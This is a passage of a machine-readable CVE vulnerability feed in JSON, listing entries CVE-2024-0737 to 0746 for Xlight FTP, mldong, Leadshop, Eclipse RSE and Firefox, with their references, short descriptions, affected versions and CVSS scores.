Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251560", "name" : "https://vuldb.com/?ctiid.251560", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251560", "name" : "https://vuldb.com/?id.251560", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251560", "name" : "https://vuldb.com/?id.251560", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:xlightftpd:xlight_ftp_server:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-19T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0738", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md", "name" : "https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md", "name" : "https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.251561", "name" : "https://vuldb.com/?ctiid.251561", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251561", "name" : "https://vuldb.com/?ctiid.251561", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251561", "name" : "https://vuldb.com/?id.251561", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251561", "name" : "https://vuldb.com/?id.251561", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:garethhk:mldong:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0739", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/vLswXhWxUrs8", "name" : "https://note.zhaoj.in/share/vLswXhWxUrs8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/vLswXhWxUrs8", "name" : "https://note.zhaoj.in/share/vLswXhWxUrs8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251562", "name" : "https://vuldb.com/?ctiid.251562", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251562", "name" : "https://vuldb.com/?ctiid.251562", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251562", "name" : "https://vuldb.com/?id.251562", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251562", "name" : "https://vuldb.com/?id.251562", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:leadshop:leadshop:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.4.0", "versionEndIncluding" : "1.4.20", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-19T22:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0740", "ASSIGNER" : "security@eclipse.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://git.eclipse.org/r/c/tm/org.eclipse.tm/+/202145", "name" : "https://git.eclipse.org/r/c/tm/org.eclipse.tm/+/202145", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://git.eclipse.org/r/c/tm/org.eclipse.tm/+/202145", "name" : "https://git.eclipse.org/r/c/tm/org.eclipse.tm/+/202145", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/171", "name" : "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/171", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/171", "name" : "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/171", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Eclipse Target Management: Terminal and Remote System Explorer (RSE) version <= 4.5.400 has a remote code execution vulnerability that does not require authentication. \n\n\n\n\n\nThe fixed version is included in Eclipse IDE 2024-03\n\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eclipse:target_management:*:*:*:*:*:*:*:*", "versionEndIncluding" : "4.5.400", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-04-26T10:15Z", "lastModifiedDate" : "2025-02-03T21:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0741", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1864587", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1864587", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1864587", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1864587", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0742", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867152", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867152", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867152", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867152", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_esr:*:*:*:*:*:*:*:*", "versionEndExcluding" : "115.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0743", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-252" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867408", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867408", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867408", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1867408", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00010.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-13/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-13/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-13/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-13/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-14/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-14/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-14/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-14/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.9, and Thunderbird < 115.9." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0744", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-119" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871089", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871089", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871089", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871089", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0745", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871838", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871838", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871838", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1871838", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-23T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0746", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1660223", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1660223", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1660223", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1660223", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html", "refsource" : "", "tags" : [ "Mailing List", "Third Party Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-01/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-02/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-04/", "refsource" : "", "tags" : [ "Release Notes", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ 